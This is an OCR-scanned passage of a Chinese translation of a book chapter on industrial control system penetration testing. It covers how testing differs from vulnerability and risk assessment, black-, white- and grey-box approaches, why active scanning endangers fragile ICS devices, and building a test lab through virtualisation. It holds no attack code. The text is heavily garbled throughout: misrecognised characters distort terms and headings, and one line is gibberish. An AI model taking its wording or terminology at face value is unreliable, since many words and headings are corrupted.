章 并 不 打算 对 传统 渗透 测试 过 程 中 所 涉及 的 每 个 步骤 进行 面面俱到 的 介绍 。 因 为 对 于 如 何 开展 渗透 测试 ， 已 经 出 版 了 大 量 书籍 。 而 我 们 主要 关注 于 专门 针对 工控 
系统 渗透 测试 的 特殊 策略 与 注意 事项 。 在 第 ? 章 、 第 6 章 以 及 第 7 章 中 ， 我 们 将 会 对 同 工 控 系 统 渗透 测试 相关 的 各 种 方法 与 技术 进行 细致 分 析 。 如 果 读 者 对 传统 渗透 
测试 方法 与 技术 感 兴趣 ， 本 章 结束 位 置 会 提供 一 些 极 具 参考 价值 的 延伸 阅读 。 对 通用 攻击 分 类 的 详细 列表 也 可 以 在 第 3 章 中 找到 ， 第 3 章 主要 分 析 了 威胁 建 模 以 及 
风险 场景 构建 过 程 。 
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无 论 是 出 于 安全 方面 还 是 实现 最 优 配置 方面 的 考虑 ， 机 构 都 应 该 聘请 一 名 经 验 丰 富 的 渗透 测 斌 人员。 渗透 测试 对 专业 程度 要 求 高 ， 需 要 精通 高 级 技能 ， 而 这 
并 不 是 任何 一 名 网 络 安全 专家 都 能 够 具备 的 。 例 如 ， 虽 然 部 分 安全 专家 拥有 注册 信息 系统 安全 专家 (Certified Information Systems Security Professional, CISSP) 认 
证 ， 但 并 不 意味 着 他 们 能 够 胜任 渗透 测试 工作 。 所 谓 技能 并 不 仅仅 要 求 具备 相关 的 技术 水 平 ， 还 需要 具备 实际 的 经 验 。 对 于 工控 系统 环境 而 言 ， 渗 透 测 试 人 员 应 
该 对 工控 系统 有 着 透彻 的 理解 ， 因 此 高 度 建议 在 这 些 项 目 中 配备 具有 相关 背景 的 工程 师 。 
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4.1 AAAH 


首先 ， 我 们 需要 澄清 一 个 常见 的 误解 。 渗 透 测试 和 脆弱 性 评估 并 不 是 一 回 事 。 我 们 发 现在 很 多 天 于 工业 网 络 安全 标准 要 求 的 解释 中 将 两 者 作为 同义词 使 用 ， 
经 常 仪 仅 使 用 其 中 的 某 一 个 术语 ， 而 无 视 另 外 一 个 。 即 便 对 于 不 是 专门 针对 工控 系统 的 标准 ， 例 如 NIST SP800-115, 《信息 安全 测试 与 评估 技术 指南 》 也 混淆 了 
两 个 主题 之 间 的 界限 。 我 还 看 到 有 时 在 应 该 使 用 术语 “渗透 测试 ”与 “脆弱 性 评估 ”的 地 方 使 用 了 术语 “风险 评估 ”， 这 就 更 令 人 感到 困惑 了 。 所 以 ， 为 了 使 读 
者 在 书 中 同一 页 上 看 到 这 些 术语 及 其 定义 时 不 至 于 混淆 不 清 ， 我 们 首先 化 些 时 间 来 回顾 一 下 这 些 术语 : 


- 脆弱 性 评估 


脆弱 性 评估 是 对 安全 态势 的 全 面 审查 ， 以 期 尽 可 能 发 现 更 多 的 脆弱 性 。 脆 弱 性 评估 通常 借助 人 工 以 及 上 自动 化 检测 技术 予以 实现 ， 包 括 脆弱 性 扫描 工具 以 及 配 
置 审查 。 该 术语 无 论 对 于 工控 系统 环境 还 是 其 他 环境 都 是 适用 的 。 


` 渗透 测试 


渗透 测试 (也 被 称 作 pentest 或 者 security test) 不 同 于 脆弱 性 评估 ， 渗 透 测试 的 目的 并 不 是 清除 Li 没有 双关 的 意思 ， 渗 透 测 试 人 员 都 懂 。 脆 弱 性 列表 中 的 所 
有 脆弱 性 ， 是 针对 特定 目的 与 (或 ) 具体 目标 ， 通 过 模拟 攻击 者 的 技术 、 方 法 及 现实 中 采用 的 策略 的 方式 开展 攻击 性 测试 。 由 于 本 书 主要 介绍 渗透 测试 ， 而 本 章 
则 主要 讨论 渗透 测试 的 目的 ， 我 们 稍 后 将 会 对 细节 进行 深入 的 讨论 。 


- 风险 评估 


风险 评估 主要 在 两 种 不 同 的 环境 下 进行 讨论 。 通 常情 况 下 ， 风 险 评 估 是 指针 对 风险 进行 度量 、 打 分 或 者 评级 的 计算 与 分 析 过 程 ， 其 计算 与 分 析 过 程 可 以 是 定 
量 的 ， 也 可 以 是 定性 的 。 在 此 情况 下 ， 也 可 以 称 之 为 风险 分 析 (这 种 称呼 方式 可 能 更 加 合适 ) 。 渗 透 测试 既 可 以 针对 整个 环境 也 可 以 针对 仅 出 现 一 次 的 单个 设 
备 ， 完 善 的 变更 管理 过 程 对 此 提出 了 专门 的 要 求 。 从 广义 的 角度 来 说 ， 风 险 评估 指 对 多 个 系统 或 者 整个 组 织 进行 风险 度量 的 总 体 过 程 。 其 通常 与 一 个 完整 的 、 规 
模 较 大 的 项 目 有 关 ， 融 像 在 第 2 章 中 讨论 的 那样 。 风 险 评估 利用 了 来 目 多 个 不 同 组 成 部 分 的 数据 ， 包 括 脆弱 性 评估 以 及 渗透 测试 。 没 错 ! 渗透 测试 应 该 作为 总 体 风 
险 评估 过 程 中 的 一 个 组 成 部 分 ， 如 果 还 认识 不 到 这 一 点 ， 那 么 现在 本 章 的 剩余 部 分 将 会 对 其 原因 进行 解释 。 


很 多 工业 网 络 安全 标准 以 及 最 佳 实践 (例如 ，NIST SP800-82 指 南 、1SA-99/IEC62443 标 准 等 ) 都 建议 开展 一 定 程度 的 渗透 测试 (或 者 称 之 为 安全 测试 ) ， 
但 是 它们 并 未 就 针对 工控 系统 的 渗透 测试 所 涉及 的 注意 事项 、 策 略 以 及 防范 措施 提出 任何 实际 的 指导 意见 。 而 对 于 渗透 测试 能 够 带 来 哪些 实在 的 收益 ， 以 及 为 什 
么 要 开展 渗透 测试 等 问题 ， 这 些 标准 也 未 提供 更 多 的 信息 。 “开展 渗透 测试 的 原因 在 于 ( 某 项 标准 ) 对 此 提出 了 要 求 ”是 我 所 听 到 过 的 最 差劲 的 答案 ，“ 改 善 安 
全 态势 ”的 回答 则 显得 模棱两可 ， 而 “发 现 安全 态势 中 的 脆弱 性 ”更 适合 作为 脆弱 性 评估 的 工作 范畴 。 虽 然 上 述 回 答 在 特定 环境 中 都 是 可 以 讲 得 通 的 (可 能 除了 
第 一 个 之 外 ) ， 但 它们 都 不 是 真正 的 答案 ， 而 仪 仅 是 答案 的 一 部 分 。 之 所 以 应 该 开展 渗透 测试 ， 其 原因 在 于 : 


- 验证 之 前 在 脆弱 性 评估 中 发 现 的 脆弱 性 (脆弱 性 扫描 工具 会 生成 大 量 误 报 ， 而 在 控制 与 需求 分 析 过 程 中 发 现 的 差距 仅仅 提供 了 存在 脆弱 性 的 理论 假设 ) 。 
" 验证 安全 控制 措施 的 成 功 实施 (或 者 不 成 功 ， 根 据 情况 而 定 ) o 
- 作为 总 体 风险 评估 过 程 或 项 目的 一 部 分 ， 如 果 脆 弱 性 可 以 利用 ， 渗 透 测 试 可 以 提供 脆弱 性 是 否 有 效 的 “概率 ”可 能 性 ) 数据 ， 以 及 利用 难度 如 何 。 


说 得 直 日 一 些 ， 基 于 标准 的 “差距 分 析 ” 或 者 说 是 审计 ， 甚 至 可 以 说 是 技术 型 脆弱 性 扫描 ， 仪 仅 提 供 了 可 能 存在 脆弱 性 的 理论 证 据 。 而 严重 程度 以 及 可 能 性 
的 评级 大 多 更 加 主观 ， 而 且 经 常 是 完全 随意 评定 的 。 最 后 ， 试 图 对 项 目 中 发 现 的 诸多 脆弱 性 进行 逐个 修复 、 缓 解 ， 或 者 采用 “全 和 窗 盖 的 最 佳 实践 ”所 需要 的 工作 
量 超 乎 想象 ,并 且 耗 时 其 多 ， 耗 费 甚大 。 渗 透 测试 则 可 以 借助 现实 中 的 数据 与 专业 知识 来 帮助 机 构 确定 哪些 脆弱 性 是 误 报 ， 哪 些 是 真实 存在 的 威 肋 ， 如 何 对 脆弱 
性 加 以 利用 ， 并 实际 测算 漏洞 利用 的 难度 与 可 能 性 。 需 要 记 住 的 是 ， 对 漏洞 利用 潜在 可 能 性 的 评估 仪 仪 是 第 一 步 ， 还 需要 更 多 的 威胁 情报 数据 ， 正 如 我 们 在 第 3 章 
中 所 讨论 的 那样 ， 但 是 希望 我 们 已 经 进一步 揭示 了 渗透 测试 如 何 、 从 哪些 地 方 以 及 为 什么 适应 轧 体 的 风险 评估 过 程 。 最 后 ， 所 获得 的 丰厚 回报 就 是 ， 渗 透 测 试 在 
帮助 机 构 了 解 如 何 部 署 有 针对 性 、 高 效 以 及 经 济 的 缓解 策略 时 发 挥 了 重要 作用 。 


[1] 原文 是 toot out。 在 网 络 安全 领域 ，toot out 指 对 设备 或 系统 进行 攻击 以 获取 root 权限。 文中 该 处 的 tfoot out 主要 指 通过 茶 种 方式 对 脆弱 性 进行 修复 ， 从 而 将 其 从 


脆弱 性 列表 中 剔除 。 一 译 者 注 


4.2 ”黑金 测试 、 日 使 测 试 与 灰 侈 测试 


对 很 多 人 ， 尤 其 是 对 渗透 测试 比较 熟悉 的 人 们 而 言 ， 黑 盒 测 试 、 昌 盒 测试 与 灰 盒 测 试 的 概念 已 经 非常 熟悉 了 。 但 是 ， 理 解 这 些 不 同 的 测试 策略 如 何 应 用 于 工 
控 系 统 环 境 ， 以 及 在 应 用 过 程 中 有 哪些 注意 事项 ， 可 能 市 来 哪些 风险 是 非常 重要 的 一 件 事 。 


- 黑 盒 测试 


黑 盒 主要 指 测试 人 员 之 前 对 测试 目标 知之 甚 少 或 者 完全 不 了 解 的 情况 下 所 进行 的 渗透 测试 ， 其 中 测试 目标 对 象 可 以 包括 设备 、 应 用 程序 、 系 统 或 者 是 整个 机 
构 。 测 试 过 程 主要 以 潜在 攻击 者 (外 部 人 员 ) 的 视角 来 展开 。 从 结果 来 看 ,黑金 测 试 可 能 会 给 生产 工控 系统 环境 市 来 极 大 风险 。 因 此 ， 强 烈 建议 (部 分 监管 严格 
的 行业 对 此 已 经 做 出 了 明确 要 求 ) 主动 黑 盒 测试 应 该 仪 在 测试 或 者 开发 环境 和 实验 室 中 进行 ， 而 不 应 该 在 生产 环境 中 开展 。 


` BAMA 


在 日 使 测试 中 ,测试 人 员 在 测试 过 程 中 可 以 获取 到 关于 测试 环境 与 系统 的 所 有 信息 ， 包 括 公司 信息 、IP 地 址 、 操 作 系 统 以 及 应 用 程序 等 ， 而 且 测 试 人 员 通 党 
甚至 可 以 获取 到 源 代码 。 所 以 ， 源 代码 审计 被 看 作 是 日 盒 测试 的 一 种 形式 。 当 在 日 铭 测 试 场景 中 开展 技术 型 脆弱 性 评估 时 ,测试 人 员 也 会 拿 到 理想 的 结果 。 昌 然 
在 日 铭 测 试 环境 中 开展 渗透 测试 必定 会 更 加 有 效 与 准确 ， 但 是 日 金 测试 场景 会 对 “现实 ”中 攻击 者 视角 予以 限制 ， 而 攻击 者 视角 通常 正 是 渗透 测试 所 追求 的 效 
果 。 这 并 不 是 说 在 白 盒 测试 环境 下 不 应 该 进行 渗透 测试 。 只 是 需要 意识 到 在 白 盒 测 试 环境 下 开展 渗透 测试 的 收益 与 局 限 。 例 如 ， 如 果 需 要 模拟 由 了 解 组 织 染 构 、 


环境 、 系 统 的 内 部 人 员 或 者 前 内 部 人 员 发 起 的 攻击 ， 那 么 日 盒 测试 将 会 是 理想 的 测试 方式 。 如 果 开 展 严 格 的 脆弱 性 研究 工作 (0-day 漏洞 挖掘 ) , PARA Mina 
是 必须 的 。 最 后 ， 所 有 这 些 都 是 以 适当 的 方式 在 适当 的 环境 中 开展 的 ， 且 能 市 来 预期 效果 的 渗透 测试 。 开 展 源 代码 审计 显然 对 于 生产 工控 系统 环境 是 没有 风险 
的 ,但 是 对 于 任何 形式 的 主动 渗透 测试 而 言 ， 无 论 其 是 不 是 白 盒 测 试 都 会 给 工控 系统 市 来 风险 。 即 便 是 了 解 系统 情况 的 白 盒 测 试 ， 也 应 该 在 测试 或 者 开发 环境 中 
进行 ， 抑 或 在 破坏 作用 不 足 为 虑 (虽然 我 们 很 难 找到 这 种 情况 ) 的 生产 系统 中 进行 。 


- RAMA 


思 义 ， 灰 使 测试 介 于 黑 盒 测试 与 日 金 测试 之 间 。 灰 使 测 试 通常 是 一 种 非常 常 罗 、 并 且 自 然 形 成 的 场景 ， 这 是 因为 当 尝 试 开展 日 盒 测 试 时 ， 获 取 到 足够 的 
信息 是 非常 困难 的 (除非 测试 范围 非常 有 限 ) ， 而 鉴于 大 多 数 专业 渗透 测试 规则 中 的 要 求 与 规则 的 动态 性 ， 对 测试 团队 所 了 解 的 内 容 几 乎 同样 难以 限制 。 例 如 ， 
大 多 数 客户 通常 会 要 求 整个 团队 参加 启动 会 ， 有 时 还 会 将 测试 团队 作为 之 前 技术 型 脆弱 性 评估 团队 的 一 部 分 ， 而 具体 到 工控 系统 环境 ， 为 了 避免 对 生产 系统 造成 
影响 ， 提 前 规划 以 及 工控 系统 工作 人 员 与 测试 团队 之 间 的 与 沟通 也 是 必 不 可 少 的 。 这 些 安排 都 会 使 得 测试 团队 得 以 不 同 程度 地 接触 到 目标 信息 。 


43 ”特殊 考量 : 工控 系统 渗 静 测试 不 同 于 IT 系 统 渗 表 测 试 


截至 目前 ， 有 些 内 容 已 经 不 需要 再 说 了 ， 但 有 些 东 西 如 果 不 明 确 点 出 还 是 容易 忽视 ， 那 就 是 : 不 能 以 对 业务 上 T 系 统 进行 渗透 测试 的 同样 方式 开展 针对 工控 系 
统 的 渗透 测试 。 我 们 没 法 儿 告诉 读者 我 们 遇 到 了 多 少 窜 无 工控 系统 经 验 的 网 络 安全 产品 和 (或 ) 咨询 公司 (甚至 有 些 渗透 测试 人 员 也 是 如 此 ) ， 他 们 认为 “ 像 其 
他 计算 机 一 样 ， 工 控 系 统 设 备 无 非 也 是 计算 机 ， 区 别 仪 在 于 不 同 的 应 用 环境 以 及 不 同 的 用 途 。 因 为 工程 系统 无 非 也 都 是 比特 、 字 节 以 及 代码 组 成 的 ， 所 以 针对 工 
控 系 统 设备 的 渗透 测试 束 像 其 他 渗透 测试 一 样 。” 几 个 月 之 前 ,我 参加 了 一 个 石油 与 天 然 气 行业 的 网 络 安全 会 议 , 会 上 听取 了 一 家 关注 业务 |T 安 全 的 网 络 安全 产 
品 厂商 的 报告 。 报 告 的 主题 是 工控 系统 环境 网 络 安全 控制 措施 的 部 署 ， 以 及 部 署 过 程 中 的 困难 。 演 讲 者 在 考虑 网 络 安全 控制 时 并 没有 提出 工控 系统 环境 所 面临 的 
挑战 ， 而 只 是 关注 于 工控 系统 的 资产 所 有 者 不 愿意 遵循 IT 安 全 策略 。 其 所 提供 的 解决 方案 是 这 样 的 ，“ 通 过 不 断 督促 与 施 压 ， 最 终 使 得 工控 系统 资产 所 有 者 要 么 
最 终 理解 这 些 策 略 ， 要 么 届 服 顺从 于 它 。” 不 用 说 ,演讲 者 忽视 了 绝 大 多 数 听众 的 感受 ， 而 这 部 分 听众 愉 愉 是 工控 系统 的 资产 所 有 者 。 那 么 到 底 什 么 才 是 最 关键 
的 呢 ? 


世纪 之 交 ，CIA 三 元 模型 的 概念 被 提 了 出 来 ， 起 初 主 要 用 在 认证 信息 系统 安全 专家 认证 考试 当中 。 其 作用 (Confidentiality) 在 于 凝练 出 了 信息 安全 的 三 个 主 


- 保密 性 (Confidentiality) 

` ZÆ (Integrity) 

. 可 用 性 (Availability) 

虽然 从 来 没有 明确 地 解释 过 三 元 模型 在 提出 之 初 是 否 束 有 优先 顺序 ， 但 是 后 来 逐渐 演变 成 了 上 面 所 描述 的 顺序 。 


对 于 那些 并 不 真正 了 解 工 控 系 统 的 人 们 而 言 ， 上 述 概 念 通常 是 与 一 个 常识 (这 一 常识 现在 几乎 到 了 老生 常 谈 的 程度 ) 相 联 系 的 ， 那 就 是 IT 系 统 和 工控 系统 之 
间 是 “不 相连 通 ” 的 。 工 控 系 统 的 主要 功能 是 对 控制 过 程 进行 管理 、 控 制 ， 例 如 有 东 、 阀 、 电 磁 阀 等 ， 而 正 是 这 些 设备 负责 炼油 厂 、 管 道 、 制 造 工 三、 核电 站 、 电 
力 设 施 、 功 能 安全 系统 等 众多 设施 的 运行 。 其 中 很 多 系统 负责 关键 生产 和 安全 流程 的 维护 。 如 果 这 些 系统 下 线 ， 不 仅 会 导致 公司 企业 的 停工 停产 ， 而 且 还 可 能 导 
致 人 员 伤 亡 。 这 不 是 FUD (恐惧 、 不 确定 与 怀疑 ) 。 这 是 事实 。 因 此 ， 这 些 关 键 系统 也 被 归 为 “高 可 用 性 系统 ”， 与 之 关联 的 一 个 常用 术语 是 五 个 九 的 正常 运行 
时 间 (five nine uptime) 。 这 意味 着 ， 这 些 高 可 用 性 系统 必须 以 99.999% 的 概率 保持 正常 运行 (可 用 性 ) 。 因 此 ， 需 要 对 CIA 三 元 模型 中 的 优先 级 进行 调整 ， 
将 “可 用 性 ” 置 于 模型 项 部 : 


RE gò 


. 可 用 性 


工控 系统 环境 认为 系统 的 可 用 性 具有 最 高 优先 级 ， 其 次 是 友人 送 与 接收 数据 的 质量 (因为 ， 最 后 发 送 到 这 些 设备 的 错误 命令 也 会 产生 不 利 影响 ， 同 样 会 造成 设 
备 停机 ， 这 些 内 容 我 们 将 在 后 面 讨 论 ) ， 最 后 才 是 数据 的 保密 性 。 如 果 严 格 地 考虑 工控 系统 数据 ， 除 非 该 数据 指 的 是 公司 保密 的 生产 数据 或 财务 数据 ， 否 则 保密 
性 是 很 少 考虑 的 ， 而 此 时 从 技术 角度 上 来 说 这 些 数据 也 就 成 了 业务 数据 。 


而 更 糟 的 是 ， 将 “可 用 性 ” 置 于 模型 项 部 并 不 仅 仅 是 一 个 优先 级 转换 ， 然 后 就 按照 这 个 优先 顺序 来 处 理 问题 。 很 多 工程 系统 在 设计 之 初 就 没有 考虑 安全 问 
题 。 出 于 这 个 原因 ， 除 了 系统 需要 实现 的 功能 ， 系 统 在 设计 时 根本 没有 考虑 其 他 任何 问题 。 因 此 ， 有 许多 因素 可 能 对 工控 系统 造成 不 利 影响 ， 而 对 其 他 系统 则 影 
响 不 大 ， 例 如 业务 上 系统 中 的 内 屏 现象 可 能 不 算 什 么 ， 但 是 对 于 工控 系统 却 并 非 如 此 。 在 后 面 的 章节 中 ， 我 们 将 会 更 加 细致 地 讨论 这 些 注意 事项 。 但 现在 ， 先 要 
高 度 概括 一 下 IT 系 统 与 工控 系统 之 间 一 些 更 重要 的 差 蛋 ， 这 些 差 异 在 渗透 测试 过 程 中 非常 棘手 (这 也 可 能 会 被 用 来 构造 拒绝 服务 攻击 ) ， 从 而 对 生产 工控 系统 系 
统 的 可 用 性 造成 威胁 : 
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WS LitKRINE, (RPLCLARRTUABEAR TERATE, MERA TANER ERY PORE A aU. Sa, RHI BATON BESS? 
响 设备 的 可 用 性 ， 导 致 包 括 响应 中 断 、 复 位 、 故 障 、 网 络 通信 中 断 ， 甚 至 出 现 配 置 丢 失 的 现象 。 


` 工控 系统 设备 的 网 络 堆 栈 处 理 能 力 较 弱 


很 多 工控 系统 设备 处 理 噶 冲 流 量 的 能 力 特别 差劲 。 当 向 工控 系统 设备 发 送 异 党 流量 时 ， 例 如 超 长 数据 包 、 畸 形 数据 包 、 高 速 网 络 法 量 以 及 未 使 用 预期 的 协议 
数据 包 ， 也 会 出 现 上 述 后 果 。 对 网 络 堆 栈 的 负面 影响 会 导致 或 者 加 剧 处 理 能 力 过 载 国 值 较 低 的 问题 。 


. 遗留 系统 的 使 用 


大 多 数 工控 系统 环境 中 依然 保留 有 大 量 的 遗留 系统 ， 无 论 是 控制 设备 本 身 还 是 老式 的 服务 器 与 工作 站 ， 而 这 些 老式 服务 器 与 工作 站 还 都 使 用 着 Windows XP 
甚至 是 Windows NT、Windows95 操 作 系统 。 是 的 ， 你 没 看 错 。 虽 然 有 些 难以 置信 ， 但 是 一 套 标准 的 控制 系统 其 服役 年 限 可 能 回溯 到 20 年 前 甚至 更 久 。 再 加 上 现 
实情 况 下 ， 很 少 在 整个 系统 环境 下 进行 染 构 升级 ， 这 样 束 知道 了 为 什么 还 会 有 遗留 系统 仍 在 服役 。 在 看 到 前 面 提 到 的 两 种 现状 之 后 ， 很 容易 想到 遗留 控制 设备 为 
什么 会 成 为 工控 系统 环境 中 的 火 手 问题 ， 而 老式 设备 中 的 遗留 操作 系统 则 会 从 其 他 角度 导致 同样 火 手 的 问题 。 还 记得 “蓝屏 死机 ”以 及 所 有 其 他 在 Windows 早 期 
版 本 中 频繁 出 现 的 崩 演 情况 吗 ? (好 吧 ， 虽 然 读者 中 间 的 大 多 数 人 仍然 会 遇 到 这 些 情 况 ， 但 它们 主要 流行 于 20 世 纪 90 年 代 和 21 世 纪 初 。) 然而 ， 这 些 问 题 仍 然 存 
在 于 遗留 设备 的 Windows 操 作 系 统 中 ， 而 这 些 操 作 系统 还 在 生产 系统 中 运行 着 。 它 需要 的 只 是 合适 的 条 件 。 一 旦 满足 某 些 条 件 .….. 咖 ! 快 瞧 ! 我 们 的 老 朋 友 “ 监 
屏 死 机 ”又 回来 了 。 需 要 注意 到 的 是 ， 我 们 讨论 的 不 只 是 网 络 条 件 。 仪 仅 因 为 在 这 些 遗 留 系统 中 安 半 了 不 合适 的 软件 也 可 能 会 导致 资源 耗 尺 和 系统 崩溃 。 


-网络 带 宽 较 低 


同 传统 的 业务 上 网络 相 比 ， 许 多 工控 系统 网 络 用 于 网 络 连接 的 囊 宽 较 低 ， 其 原因 在 于 工控 系统 使 用 了 老 旧 的 网 络 设备 和 (或 ) 使 用 了 工业 无 线 网 络 ， 包 括 移 
动 宽带 和 卫星 。 引 入 高 速 网 络 流量 可 能 会 导致 网 络 延 迟 甚 至 网 络 通信 的 中 断 。 即 使 看 似 无 害 的 网 络 流量 也 可 能 会 导致 部 分 工控 系统 网 络 的 延迟 ， 而 对 于 高 可 用 性 
网 络 ， 延 迟 更 是 不 可 接受 的 。 


最 令 人 不 安 的 是 ， 这 些 条 件 不 仅仅 存在 于 遗留 系统 中 。 虽 然 工 控 系 统 厂商 开始 着 手 开发 更 加 健壮 的 设备 ， 但 是 在 最 近 发 布 的 设备 中 我 们 依然 友 现 了 这 些 间 
题 。 在 近期 一 次 重要 的 网 络 安全 会 议 中 (2015) ， 我 同 厂 商 束 上 述 问 题 进行 了 讨论 。 我 通过 一 条 简单 的 专门 构造 的 ping 命 令 就 破坏 了 其 工控 系统 设备 的 整套 演示 
设置 。 (当然 ,我 获得 了 进行 演示 的 许可 。) 同样 重要 的 是 ， 还 要 考虑 到 这 样 一 个 事实 ， 即 使 是 更 新 、 更 健壮 的 设备 也 不 会 在 一 夜 之 间 就 取代 部 署 有 数 百 台 设 备 
的 系统 中 的 老 旧 设备 。 


而 底线 在 于 ， 工 控 系 统 设备 (遗留 设备 和 新 型 设备 都 适用 ) 无 法 对 “陌生 ”流量 进行 正常 响应 ， 而 且 遗 留 操 作 系 统 需 要 保持 原样 。 许 多 遗留 PLC 的 服役 年 限 
都 可 以 上 溯 到 20 ~ 30 年 前 。 常 见 的 主动 渗透 测试 拷 术 ， 例 如 脆弱 性 扫描 器 ， 甚 至 是 像 Nmap 一 样 的 简单 网 络 扫描 工具 都 能 够 导致 本 草 中 所 讨论 的 问题 。 如 果 关 心 
生产 网 络 的 可 用 性 ， 那 么 所 有 的 主动 扫描 和 测试 都 应 该 在 测试 开发 环境 中 进行 。 


4.4 ”实验 环境 的 部 署 


使 用 实验 环境 是 确保 主动 渗透 测试 技术 不 对 生产 网 络 造 成 影响 的 最 有 效 方 法 。 然 而 ， 从 所 使 用 的 系统 、 设 备 、 架 构 、 版 本 到 配置 信息 ， 都 需要 确保 实验 环境 
的 部 署 能 够 对 生产 网 络 进行 合理 的 仿真 。 人 否则 ， 最 后 的 报告 很 可 能 并 不 会 反映 实际 生产 网 络 中 的 真实 安全 态势 。 那 么 ， 如 何 做 到 这 一 点 呢 ? 


大 多 数 拥有 工控 系统 网 络 的 机 构 都 拥有 一 个 测试 开 友 网 络 ， 在 测试 开 友 网 络 中 包含 了 从 设备 、 固 件 版 本 到 操作 系统 都 同 生产 网 络 相 类 似 (如 果 做 不 到 完全 一 
致 ) 的 设备 与 系统 。 嗯 ， 至 少 对 于 关心 生产 网 络 可 用 性 的 人 们 而 言 ， 几 乎 所 有 进入 生产 网 络 的 设备 系统 无 论 如 何 都 要 在 部 署 之 前 进行 测试 。 当 然 ， 这 是 最 理想 的 
情况 。 如 果 不 具 备 这 样 的 实验 环境 ， 则 无 法 进行 测试 ， 又 或 者 实验 环境 不 能 够 真实 地 反映 同 生产 网 络 的 相似 点 ， 那 么 将 不 得 不 自己 动手 来 部 署 实验 环境 .。 


44.1 从“ 类似” 配置 的 系统 中 取样 


在 实验 环境 中 对 整个 生产 网 络 进行 复制 显然 行 不 通 ， 也 不 必要 。 因 此 ， 实 验 环境 部 署 的 目标 在 于 对 每 种 型 号 的 设备 、 服 务 器 和 工作 站 各 种 不 同 的 安装 配置 进 
行 采 样 。 例 如 ， 如 果 接 受 了 对 多 人 台 西 门 子 37-300PLC 设 备 进行 测试 的 任务 ， 那 么 在 测试 实验 环境 中 至 少 要 部 署 有 一 台 相 同型 号 的 设备 。 当 然 ， 如 果 固 件 版 本 不 同 
并 且 配 置 不 同 ， 那 么 对 于 每 种 设置 至 少 要 选 出 一 个 代表 。 对 于 所 有 其 他 的 设备 品牌 、 型 号 以 及 服务 器 和 工作 站 也 是 一 样 。 需 要 在 硬件 、 操 作 系统 、 应 用 程序 、 权 
限 以 及 其 他 配置 等 方面 ， 从 典型 配置 的 服务 器 和 工作 站 中 选取 具有 代表 性 的 系统 。 通 过 运用 采样 策略 ， 通 常 可 以 确定 在 实验 环境 中 发 现 的 任何 问题 也 将 同样 存在 
于 与 之 对 应 的 生产 系统 当中 。 


Oz 


针对 拥有 数 百 台 控制 设备 的 大 型 环境 进行 的 测试 很 可 能 包含 数 十 种 不 同 配置 ， 这 不 仅仅 是 因为 这 些 设备 的 功能 各 异 ， 还 因为 很 多 资产 所 有 者 和 工程 师 也 不 知 
道 现场 中 每 台 设 备 的 确切 配置 。 在 这 种 情况 下 ， 只 能 尽力 而 为 。 这 就 是 为 什么 维护 一 个 准确 且 不 断 更 新 的 资产 清单 非常 重要 ， 特 别 是 为 什么 渗透 测试 应 该 作为 整 


体 风险 评估 过 程 的 一 部 分 ， 其 中 整体 风险 评估 过 程 还 包括 信息 收集 和 资产 清单 的 核实 。 


44.2 虚拟 化 


在 实验 环境 中 对 生产 控制 设备 进行 仿真 的 工作 相对 简单 。 例 如 ， 拿 到 一 台 同 生产 系统 中 设备 具有 相同 型 号 的 备用 PLC， 对 其 进行 编程 后 就 可 以 直接 插入 到 系 
统 中 。 好 吧 ， 昌 然 简 化 了 不 少 内 容 ， 但 基本 思路 应 该 明白 了 吧 。 而 仿真 工程 师 站 、 人 机 界面 、 工 业 实时 历史 数据 库 、SCADA 服 务 器 等 设备 时 ， 事 情 束 变 得 复杂 多 
了 。 因 为 功能 多 样 的 计算 机 同 控制 设备 相 比 具 有 更 多 的 变化 特性 。 搜 集 所 有 需要 的 计算 机 硬件 融 是 一 个 问题 ， 特 别 是 对 于 在 客户 现场 进行 测试 的 第 三 方 公司 而 
， 搜 集 的 硬件 将 迅速 占用 掉 有 限 的 空间 。 


Dll} 


最 佳 的 解决 方法 之 一 是 使 用 虚拟 化 来 对 生产 服务 器 和 工作 站 进行 复制 。 借 助 虚拟 化 解决 方案 ， 例 如 VMware 的 vSphere、 微 软 的 Hyper-V、 红 帽子 的 KVM， 
以 及 许多 其 他 虚拟 化 方案 ， 能 够 保证 在 单个 服务 器 上 实现 对 整个 服务 器 和 工作 站 环境 (只 要 硬件 与 资源 足够 强大 ) 的 仿真 。 如 果 在 测试 过 程 中 足够 幸运， 发 现 测 
试 目标 已 经 处 在 部 署 于 虚拟 化 平台 上 的 服务 器 和 工作 站 环境 中 了 ， 或 者 客户 使 用 虚拟 化 作为 备份 解决 方案 ， 那 么 事情 就 变 得 轻松 容易 得 多 了 。 对 生产 服务 器 和 工 
作 站 进行 几乎 一 模 一 样 的 快速 仿真 在 短 时 间 内 就 可 以 完成 。 遗 憾 的 是 ， 这 种 情况 在 大 多 数 工控 系统 环境 中 很 少见 。 

然而 ， 许 多 虚拟 化 平台 能 够 帮助 测试 人 员 根 据 不 同 格 式 的 备份 镜像 创建 虚拟 机 。 这 种 情况 对 于 大 型 组 织 很 可 能 是 最 佳 选择 ， 而 许多 规模 较 小 的 工控 系统 环境 
甚至 不 会 有 备份 或 “黄金 镜像 ”， 所 以 另 一 种 选择 是 从 在 线 物 理 机 创建 虚拟 机 。 例 如 ，VMware 就 提供 了 一 个 免费 的 将 物理 机 转换 为 虚拟 机 的 工具 (vCenter 
Converter, https://www.vmware.com/products/converter) ， 借 助 该 工具 能 够 在 无 需 关 闭 主 机 的 情况 下 将 在 线 物理 机 转换 为 虚拟 机 。 (该 工具 也 可 以 用 来 将 
磁盘 镜像 转换 为 虚拟 机 。) 对 于 不 愿意 在 工控 系统 服务 器 和 工作 站 上 安装 其 他 工具 的 操作 人 员 而 言 ， 无 需 安装 的 微软 Sysinternals 套 件 则 是 一 个 很 好 的 选择 。 
Sysinternals 套 件 有 一 个 工具 叫做 Disk2vhd (https://technet.microsoft.com/en-us/sysinternals/ee656415.aspx) ， 使 用 该 工具 可 以 达到 同样 的 效果 。 


图 4-1 到 图 4-7 是 在 VMware ESX 服 务 器 环境 下 ， 使 用 vCenter Converter 进 行 转换 的 过 程 实例 。 


在 实时 系统 中 使 用 诸如 vCenter Convertet 之 类 的 转换 工具 对 资源 消耗 比较 大 ， 可 能 会 对 生产 系统 造成 不 利 影响 。 它 可 能 会 导致 延迟 其 至 导致 系统 中 断 或 者 前 
渍 。 如 果 生 产 系 统 资源 有 限 ， 或 者 对 延迟 较为 关注 ， 那 么 在 使 用 这 些 工 具 的 过 程 中 就 要 非常 小 心 了 。 


wet 
